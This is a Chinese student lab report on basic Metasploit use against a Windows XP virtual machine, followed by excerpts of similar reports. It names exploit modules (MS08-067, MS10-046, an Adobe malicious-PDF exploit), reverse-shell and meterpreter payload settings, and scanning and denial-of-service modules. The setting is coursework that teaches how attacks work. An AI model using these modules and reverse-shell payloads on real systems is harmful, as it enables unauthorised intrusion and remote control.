2018-2019-2 20165332《网络攻防技术》Exp5 MSF基础应用

2018-2019-2 20165332《网络攻防技术》Exp5 MSF基础应用

1.基础问题回答

用自己的话解释什么是exploit,payload,encode.

exploit:就是利用可能存在的漏洞对目标进行攻击,相当于一个载具

payload:就是攻击的代码,是载荷。

encode:为了帮助攻击载荷避免被杀软发现,进行伪装。

2.实践总结与体会

在辅助模块这里,可以发现很多旧版本的软件有漏洞,从而可以进行相关的攻击,在此次实验中就体验了旧版本有漏洞的一些软件进行了攻击并且很轻易就实现了,所以有漏洞时,一定要尽快打补丁,不能让别人有机可乘哈哈哈。。

3.离实战还缺些什么技术或步骤?

实战的时候要结合靶机的具体环境考虑,结合具体应用的漏洞去实践。

4.实践过程记录

主动攻击:ms08_067

windows ip :192.168.128.135
kali ip :192.168.128.133
实验前先查看kali与靶机是否可以ping通

输入msfconsole进入msf,首先使用search命令搜寻有关漏洞MS08_067的相关信息

用use exploit/windows/smb/ms08_067_netapi使用该模块:
再使用show payloads查看可以供我们使用的payload:

用show targets查看可以被攻击的靶机的操作系统型号,这里我们默认选择0采用自动选取

?
接下来设置攻击有效载荷(set payload generic/shell_reverse_tcp)
我们的目的是为了获取靶机的shell,因此这里我们选择通过反向连接来获取shell的generic/shell_reverse_tcp当payload,使用指令set payload generic/shell_reverse_tcp对payload进行设置:

使用指令show options查看我们需要设置的参数,发现需要设置一个
RHOST(远程主机,即靶机的IP地址)和一个LHOST(本地主机,即攻击机的IP地址):

设置完相应的参数后,再次使用show options对攻击的选项进行查看:

?
攻击成功后获取了靶机的shell,使用systeminfo指令查看靶机系统信息:

在kali上执行ipconfig/all得到如下图所示:

IE浏览器渗透攻击——ms10_046安全漏洞

基本步骤还是和上面一样,先利用search ms10_046指令查看可以运用的攻击模块:

使用命令,选取模块use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
使用指令set payload generic/shell_reverse_tcp对payload进行设置:
再输入命令show options
然后查看需要设置的参数,SRVHOST填的是本地监听主机的IP地址,LHOST也是监听的IP地址,所以这里SRVHOST和LHOST都应该填攻击机的IP地址:

进行设置并且查看:

使用exploit指令执行漏洞,可以看到生成了一个url:

在靶机的IE浏览器上使用该url进行访问,在MSF终端看见提示404错误

针对客户端的攻击

用search adobe查询一下针对该漏洞的攻击模块:

选择了rank为good这款:

输入命令use exploit/windows/fileformat/adobe_utilprintf进入该漏洞模块的使用

使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷。
输入命令show options显示我们需要在攻击前需要设置的数据
输入exploit,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里。

粘贴到xp中:

使用use exploit/multi/handler新建一个监听模块
使用set payloads windws/meterpreter/reverse_tcp建立一个反向连接,设置set LPORT 5332

使用命令exploit开始攻击,在xp中打开pdf。同时kali会显示连接成功的结果。

输入shell获取靶机信息

在靶机xp中使用命令netstat -an,看本地tcp连接。

辅助模块应用

开放端口扫描
使用show auxiliary查看可以运用的辅助模块:

使用此模块扫描端口use auxiliary/scanner/portscan/syn
使用命令show optionsset RHOSTS 192.168.128.136(目标)set THREADS 50(线程)exploit

监听结果显示:

枚举系统上的用户
模块:auxiliary/scanner/smb/smb_enumusers
功能:枚举系统上的用户
使用命令:use auxiliary/scanner/smb/smb_enumusers进行设置:

然后就可以开始exploit了。

cert扫描
用途:可以查到一个子网段内的服务器的证书情况。
这是用于扫描ssl证书的,ssl安全连接需要身份认证——数字证书
使用命令use auxiliary/scanner/http/cert进行相关设置

扫描结果:

MS02 _ 063 _ pptp_dos

这是Windows 2000/XP中PPTP服务的拒绝服务攻击缺陷。
攻击者利用此缺陷仅仅能够进行拒绝服务攻击,并不能获得任何信息和任何权限。
使用use使用此模块:

进行配置:

exploit看看效果:竟然被拒绝了。。。

arp_sweep
arp_sweep使用ARP请求枚举本地局域网络中的所有活跃主机进行扫描。进入模块后查询一下参数,
msf > use auxiliary/scanner/discovery/arp_sweep ---进入arp_sweep 模块
msf auxiliary(arp_sweep) > show options ---查询模块参数
并且配置好后进行exploit:

因为打开了win xp和虚拟机kali,扫描到了好几个活跃机,
发现xp的ip地址是:
192.168.128.138
主机的ip地址是
192.168.128.1

原文地址:https://www.cnblogs.com/yyzzuishuai/p/10742539.html

时间: 2024-11-07 17:53:45

2018-2019-2 20165332《网络攻防技术》Exp5 MSF基础应用的相关文章

20155338 《网络攻防》Exp5 MSF基础应用

20155338 <网络攻防>Exp5 MSF基础应用 基础问题回答 1. 用自己的话解释什么是exploit,payload,encode? exploit将真正要负责攻击的代码传送到靶机中,相当于载具 payload负责执行相应的攻击代码,相当于载荷 encode是伪装,为了避免payload中坏字符影响功能,相当于编码 实验过程 Windows服务渗透攻击--MS08-067安全漏洞 攻击机:kali,ip:172.30.6.185 靶机:windows XP SP3,IP地址是172.

20155301 《网络攻防》 Exp5 MSF基础应用

20155301 <网络攻防> Exp5 MSF基础应用 基础问题 1.用自己的话解释什么是exploit,payload,encode 答:exploit就是利用一些工具的,用来收集目标靶机的这种漏洞或者个人信息,并可以进行一些比如摄屏.提权等操作. payload就是一个负载,可以负载程序或者数据等到目标靶机,实现攻击. encode是一个加密的工具,可以加密信息或者文件. Windows服务渗透攻击--ms07_029_msdns_zonename 基本信息 1.靶机型号:windows

2018-2019~6 20165107 网络对抗技术 Exp5 MSF基础应用

20165107 网络对抗技术 Exp5 MSF基础应用 1.实验内容 1.1一个主动攻击实践,如ms08_067(成功) 1.2 一个针对浏览器的攻击,如ms11_050(成功) 1.3 一个针对客户端的攻击,如Adobe(成功) 1.4 成功应用任何一个辅助模块,如scanner/rdp/ms12_020_check(唯一,成功) 2.基础问题回答:用自己的话解释什么是exploit,payload,encode. exploit相当于是载具,是渗透攻击模块,将负责攻击的代码传送到靶机中.

20155334 《网络攻防》Exp5 MSF基础应用

一.基础问题回答 解释exploit,payload,encode是什么: 项目 作用 exploit 是负载有用代码的交通工具,让代码到达目的地,并作用 payload 是有具体功能的代码,能够完成具体的任务 encode 对payload进行再编译,避免让被攻击者知道这是病毒 二.实践总结与体会 怎么说呢,这次实验是学这门课程以来遇到问题最多的一次,虽然不知道后面的实验有木有这么虐心. 苦难越多,意味着收获越多,虽然使用的都是以前的,现在看来已经过时的漏洞,但成功的喜悦还是让我幸福满满. 虽

20155211 网络攻防技术 Exp08 Web基础

20155211 网络攻防技术 Exp08 Web基础 实践内容 Web前端HTML,能正常安装.启停Apache.理解HTML,理解表单,理解GET与POST方法,编写一个含有表单的HTML. Web前端javascipt,理解JavaScript的基本功能,理解DOM.编写JavaScript验证用户名.密码的规则. Web后端:MySQL基础:正常安装.启动MySQL,建库.创建用户.修改密码.建表. Web后端:编写PHP网页,连接数据库,进行用户认证. 最简单的SQL注入,XSS攻击测

20155232《网络对抗》Exp5 MSF基础应用

20155232<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode. exploit:就是利用可能存在的漏洞对目标进行攻击,相当于一个载具 payload:就是攻击的代码,是载荷. encode:为了帮助攻击载荷避免被杀软发现,进行伪装. 实践总结与体会 在辅助模块这里,可以发现很多旧版本的软件有漏洞,从而可以进行相关的攻击,在此次实验中就体验了旧版本有漏洞的一些软件进行了攻击并且很轻易就实现了,所以有漏洞时,一定要尽快打补丁,

20145311王亦徐 《网络对抗技术》 MSF基础应用

20145311王亦徐 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,以ms08_067渗透为例 针对浏览器的攻击,以漏洞10_046为例 针对客户端的攻击,对具体应用的攻击,以对Adobe阅读器的漏洞攻击为例 最后是一个auxiliary模块的例子的应用 基础问题回答 1.解释exploit,payload,encode是什么 exploit是渗透攻击模块,利用系统服务应用中的漏洞

20145321 《网络对抗技术》 MSF基础应用

20145321 <网络对抗技术> MSF基础应用 MS08_067漏洞渗透攻击 先查看kali和windows的IP地址 进入msfconsole,选择使用ms08_067的exploit,再选择具体要负载使用的payload,设置载荷,主机ip,靶机ip 输入exploit命令即可攻击客户端.获取shell.可查看靶机IP

《网络对抗》Exp5 MSF基础应用

20155336<网络对抗>Exp5 MSF基础应用 一.基础知识回答 用自己的话解释什么是exploit,payload,encode exploit:漏洞利用,与靶机进行交互,攻击靶机的最后一步 payload:有效载荷,后面一般加要对靶机进行攻击的代码,可以实现任何运行在受害者环境中的程序所能做的事情 encode:编码器,对代码进行异或运算.去除坏字符等等,保护payload不被发现 二.实践过程 1.Windows服务渗透攻击--MS08-067安全漏洞 ①攻击机:kali ②靶机:

20155330 《网络对抗》 Exp5 MSF基础应用

20155330 <网络对抗> Exp5 MSF基础应用 实践过程记录 Windows服务渗透:MS08_067漏洞攻击 攻击机:kali IP地址:192.168.124.132 靶机:windows XP SP3 简体中文 IP地址:192.168.124.135 输入命令use exploit/windows/smb/ms08_067_netapi 设置参数 set payload generic/shell_reverse_tcptcp反向回连 set LHOST 192.168.23